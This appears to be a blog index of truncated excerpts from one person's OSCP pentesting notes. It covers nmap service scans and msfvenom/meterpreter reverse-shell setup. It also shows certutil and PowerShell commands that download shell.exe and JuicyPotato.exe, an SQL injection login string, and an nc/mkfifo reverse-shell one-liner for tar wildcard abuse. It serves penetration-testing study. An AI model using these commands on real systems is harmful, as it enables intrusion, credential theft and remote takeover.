MSFVenom CheatSheet

Run MSFCONSOLE startup quietly sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST; set LPORT 443; exploit" Binaries Payloads Linux Meterpreter Reverse Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local…

Comments Off on MSFVenom CheatSheet


MSSQL Services mssql-vulnerability - Nmap can be leveraged to scan MsSQL for Known vulnerabilities.   Example Syntax:   nmap -vv -sV -Pn -p [PORT] --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa [IP]   mssql-default -…

Comments Off on MSSQL OSCP


NMAP Script nmap -sV -p 111 --script=rpcinfo nmap -p 111 --script nfs* Mount NFS mkdir john Sudo mount -o nolock john Showmount to show nfs shares Showmount…

Comments Off on NFS OSCP

OSCP links

IPPSEC Website Reverse Shell Cheat Sheet Windows Privexc Linux Privexc Payload OSCP Notes Link Useful OSCP Commands IPEWorkshop OSCP Cheat Sheet

Comments Off on OSCP links


  NMAP   Scan all ports and output to file nmap -p- -sC -sV -o nmap.out  <IP Address>     TCP Scan all ports sudo nmap -sC -sS -p0-65535 <IP…

Comments Off on NMAP

Download Files Windows

Download Files Windows Download Files with Certutil certutil.exe -urlcache -f shell.exe Using Powershell to download files to Windows powershell -c "(new-object System.Net.WebClient).DownloadFile('','C:\temp\JuicyPotato.exe')" Also Great resource

Comments Off on Download Files Windows


# NMAP sudo nmap --script=ftp-anon -p 21 <IP Address> nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 # Start FTP using python sudo python -m pyftpdlib -p 21 Creating txt…

Comments Off on FTP OSCP


Simple SQL Injection to try on login form admin:' OR '1'='1 Using Nmap to scan for http exploits sudo nmap --scripts=http-vul* -p 80 <IP Address> nmap -Pn -sV -sC -vvvvv…

Comments Off on HTTP OSCP


Use Nmap to Scan host for smb exploits sudo nmap --scripts=smb-vul* <IP Address> sudo nmap --script=smb-enum* <IP Address> nmap -v -p 139, 445 --script=smb-os-discovery SMB Version Windows version CIFS…

Comments Off on SMB OSCP


The following is notes from my pentesting course for OSCP If there is a app using tar * you can do the following echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc…

Comments Off on Shells